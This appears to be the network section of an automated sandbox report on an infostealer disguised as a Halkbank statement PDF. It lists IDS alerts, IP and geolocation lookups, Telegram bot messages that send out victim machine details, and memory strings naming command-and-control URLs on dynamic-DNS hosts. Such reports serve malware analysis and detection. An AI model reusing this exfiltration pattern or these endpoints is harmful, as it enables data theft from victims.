                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49900 -> 104.21.112.1:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49849 -> 104.21.112.1:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49872 -> 104.21.112.1:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49880 -> 104.21.112.1:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49856 -> 104.21.112.1:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49889 -> 104.21.112.1:443
                    Source: unknownFTP traffic detected: 119.18.54.39:21 -> 192.168.2.9:49920 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 21:14. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 21:14. Server port: 21.220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 21:14. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.9:49777 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.9:49839 version: TLS 1.0
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:855271%0D%0ADate%20and%20Time:%2021/01/2025%20/%2022:28:57%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20855271%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:855271%0D%0ADate%20and%20Time:%2021/01/2025%20/%2022:09:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20855271%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                    Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                    Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                    Source: global trafficDNS traffic detected: DNS query: kashmirestore.com
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 21 Jan 2025 15:44:24 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 21 Jan 2025 15:44:33 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                    Source: Halkbank Ekstre.pdf.exe, 00000009.00000002.2615770776.00000000034C4000.00000004.00000800.00020000.00000000.sdmp, uAHDaCgpWpsogA.exe, 00000011.00000002.2615043055.0000000003327000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                    Source: Halkbank Ekstre.pdf.exe, 00000000.00000002.1426911260.0000000004063000.00000004.00000800.00020000.00000000.sdmp, Halkbank Ekstre.pdf.exe, 00000009.00000002.2597991445.000000000042F000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                    Source: Halkbank Ekstre.pdf.exe, 00000000.00000002.1426911260.0000000004063000.00000004.00000800.00020000.00000000.sdmp, Halkbank Ekstre.pdf.exe, 00000009.00000002.2615770776.0000000003371000.00000004.00000800.00020000.00000000.sdmp, Halkbank Ekstre.pdf.exe, 00000009.00000002.2597991445.000000000042F000.00000040.00000400.00020000.00000000.sdmp, uAHDaCgpWpsogA.exe, 00000011.00000002.2615043055.0000000003221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                    Source: Halkbank Ekstre.pdf.exe, 00000000.00000002.1426911260.0000000004063000.00000004.00000800.00020000.00000000.sdmp, Halkbank Ekstre.pdf.exe, 00000009.00000002.2615770776.0000000003371000.00000004.00000800.00020000.00000000.sdmp, Halkbank Ekstre.pdf.exe, 00000009.00000002.2597991445.000000000042F000.00000040.00000400.00020000.00000000.sdmp, uAHDaCgpWpsogA.exe, 00000011.00000002.2615043055.0000000003221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                    Source: Halkbank Ekstre.pdf.exe, 00000009.00000002.2615770776.0000000003371000.00000004.00000800.00020000.00000000.sdmp, uAHDaCgpWpsogA.exe, 00000011.00000002.2615043055.0000000003221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                    Source: Halkbank Ekstre.pdf.exe, 00000009.00000002.2615770776.0000000003371000.00000004.00000800.00020000.00000000.sdmp, uAHDaCgpWpsogA.exe, 00000011.00000002.2615043055.0000000003221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                    Source: Halkbank Ekstre.pdf.exe, 00000000.00000002.1426911260.0000000004063000.00000004.00000800.00020000.00000000.sdmp, Halkbank Ekstre.pdf.exe, 00000009.00000002.2597991445.000000000042F000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                    Source: Halkbank Ekstre.pdf.exe, 00000009.00000002.2615770776.00000000034C4000.00000004.00000800.00020000.00000000.sdmp, Halkbank Ekstre.pdf.exe, 00000009.00000002.2615770776.00000000034D6000.00000004.00000800.00020000.00000000.sdmp, uAHDaCgpWpsogA.exe, 00000011.00000002.2615043055.0000000003327000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://kashmirestore.com
                    Source: Halkbank Ekstre.pdf.exe, 00000009.00000002.2615770776.0000000003371000.00000004.00000800.00020000.00000000.sdmp, uAHDaCgpWpsogA.exe, 0000000A.00000002.1536608429.0000000003240000.00000004.00000800.00020000.00000000.sdmp, uAHDaCgpWpsogA.exe, 00000011.00000002.2615043055.0000000003221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: Halkbank Ekstre.pdf.exe, 00000000.00000002.1424810584.0000000002A5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameH&w
                    Source: Halkbank Ekstre.pdf.exe, 00000000.00000002.1426911260.0000000004063000.00000004.00000800.00020000.00000000.sdmp, Halkbank Ekstre.pdf.exe, 00000009.00000002.2615770776.0000000003371000.00000004.00000800.00020000.00000000.sdmp, Halkbank Ekstre.pdf.exe, 00000009.00000002.2597991445.000000000042F000.00000040.00000400.00020000.00000000.sdmp, uAHDaCgpWpsogA.exe, 00000011.00000002.2615043055.0000000003221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                    Source: Halkbank Ekstre.pdf.exe, 00000009.00000002.2621942141.0000000004611000.00000004.00000800.00020000.00000000.sdmp, Halkbank Ekstre.pdf.exe, 00000009.00000002.2621942141.000000000462D000.00000004.00000800.00020000.00000000.sdmp, uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.0000000004241000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: Halkbank Ekstre.pdf.exe, 00000009.00000002.2615770776.0000000003455000.00000004.00000800.00020000.00000000.sdmp, uAHDaCgpWpsogA.exe, 00000011.00000002.2615043055.0000000003303000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                    Source: Halkbank Ekstre.pdf.exe, 00000000.00000002.1426911260.0000000004063000.00000004.00000800.00020000.00000000.sdmp, Halkbank Ekstre.pdf.exe, 00000009.00000002.2615770776.0000000003455000.00000004.00000800.00020000.00000000.sdmp, Halkbank Ekstre.pdf.exe, 00000009.00000002.2597991445.000000000042F000.00000040.00000400.00020000.00000000.sdmp, uAHDaCgpWpsogA.exe, 00000011.00000002.2615043055.0000000003303000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                    Source: Halkbank Ekstre.pdf.exe, 00000009.00000002.2615770776.0000000003455000.00000004.00000800.00020000.00000000.sdmp, uAHDaCgpWpsogA.exe, 00000011.00000002.2615043055.0000000003303000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                    Source: Halkbank Ekstre.pdf.exe, 00000009.00000002.2615770776.0000000003455000.00000004.00000800.00020000.00000000.sdmp, uAHDaCgpWpsogA.exe, 00000011.00000002.2615043055.0000000003303000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:855271%0D%0ADate%20a
                    Source: Halkbank Ekstre.pdf.exe, 00000009.00000002.2621942141.0000000004611000.00000004.00000800.00020000.00000000.sdmp, Halkbank Ekstre.pdf.exe, 00000009.00000002.2621942141.000000000462D000.00000004.00000800.00020000.00000000.sdmp, uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.0000000004241000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: Halkbank Ekstre.pdf.exe, 00000009.00000002.2621942141.0000000004611000.00000004.00000800.00020000.00000000.sdmp, Halkbank Ekstre.pdf.exe, 00000009.00000002.2621942141.000000000462D000.00000004.00000800.00020000.00000000.sdmp, uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.0000000004241000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: Halkbank Ekstre.pdf.exe, 00000009.00000002.2621942141.0000000004611000.00000004.00000800.00020000.00000000.sdmp, Halkbank Ekstre.pdf.exe, 00000009.00000002.2621942141.000000000462D000.00000004.00000800.00020000.00000000.sdmp, uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.0000000004241000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2615043055.00000000033DF000.00000004.00000800.00020000.00000000.sdmp, uAHDaCgpWpsogA.exe, 00000011.00000002.2615043055.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, uAHDaCgpWpsogA.exe, 00000011.00000002.2615043055.0000000003410000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2615043055.00000000033DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                    Source: Halkbank Ekstre.pdf.exe, 00000009.00000002.2621942141.0000000004611000.00000004.00000800.00020000.00000000.sdmp, Halkbank Ekstre.pdf.exe, 00000009.00000002.2621942141.000000000462D000.00000004.00000800.00020000.00000000.sdmp, uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.0000000004241000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: Halkbank Ekstre.pdf.exe, 00000009.00000002.2621942141.0000000004611000.00000004.00000800.00020000.00000000.sdmp, Halkbank Ekstre.pdf.exe, 00000009.00000002.2621942141.000000000462D000.00000004.00000800.00020000.00000000.sdmp, uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.0000000004241000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: Halkbank Ekstre.pdf.exe, 00000009.00000002.2621942141.0000000004611000.00000004.00000800.00020000.00000000.sdmp, Halkbank Ekstre.pdf.exe, 00000009.00000002.2621942141.000000000462D000.00000004.00000800.00020000.00000000.sdmp, uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.0000000004241000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: Halkbank Ekstre.pdf.exe, 00000009.00000002.2615770776.00000000033BE000.00000004.00000800.00020000.00000000.sdmp, Halkbank Ekstre.pdf.exe, 00000009.00000002.2615770776.000000000342E000.00000004.00000800.00020000.00000000.sdmp, uAHDaCgpWpsogA.exe, 00000011.00000002.2615043055.0000000003303000.00000004.00000800.00020000.00000000.sdmp, uAHDaCgpWpsogA.exe, 00000011.00000002.2615043055.000000000326E000.00000004.00000800.00020000.00000000.sdmp, uAHDaCgpWpsogA.exe, 00000011.00000002.2615043055.00000000032DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                    Source: Halkbank Ekstre.pdf.exe, 00000000.00000002.1426911260.0000000004063000.00000004.00000800.00020000.00000000.sdmp, Halkbank Ekstre.pdf.exe, 00000009.00000002.2597991445.000000000042F000.00000040.00000400.00020000.00000000.sdmp, Halkbank Ekstre.pdf.exe, 00000009.00000002.2615770776.00000000033BE000.00000004.00000800.00020000.00000000.sdmp, uAHDaCgpWpsogA.exe, 00000011.00000002.2615043055.000000000326E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2615043055.00000000032DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                    Source: Halkbank Ekstre.pdf.exe, 00000009.00000002.2615770776.0000000003455000.00000004.00000800.00020000.00000000.sdmp, Halkbank Ekstre.pdf.exe, 00000009.00000002.2615770776.00000000033E9000.00000004.00000800.00020000.00000000.sdmp, Halkbank Ekstre.pdf.exe, 00000009.00000002.2615770776.000000000342E000.00000004.00000800.00020000.00000000.sdmp, uAHDaCgpWpsogA.exe, 00000011.00000002.2615043055.0000000003303000.00000004.00000800.00020000.00000000.sdmp, uAHDaCgpWpsogA.exe, 00000011.00000002.2615043055.0000000003298000.00000004.00000800.00020000.00000000.sdmp, uAHDaCgpWpsogA.exe, 00000011.00000002.2615043055.00000000032DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                    Source: Halkbank Ekstre.pdf.exe, 00000009.00000002.2621942141.0000000004611000.00000004.00000800.00020000.00000000.sdmp, Halkbank Ekstre.pdf.exe, 00000009.00000002.2621942141.000000000462D000.00000004.00000800.00020000.00000000.sdmp, uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.0000000004241000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: Halkbank Ekstre.pdf.exe, 00000009.00000002.2621942141.0000000004611000.00000004.00000800.00020000.00000000.sdmp, Halkbank Ekstre.pdf.exe, 00000009.00000002.2621942141.000000000462D000.00000004.00000800.00020000.00000000.sdmp, uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.0000000004241000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2615043055.0000000003410000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                    Source: Halkbank Ekstre.pdf.exe, 00000009.00000002.2615770776.0000000003516000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
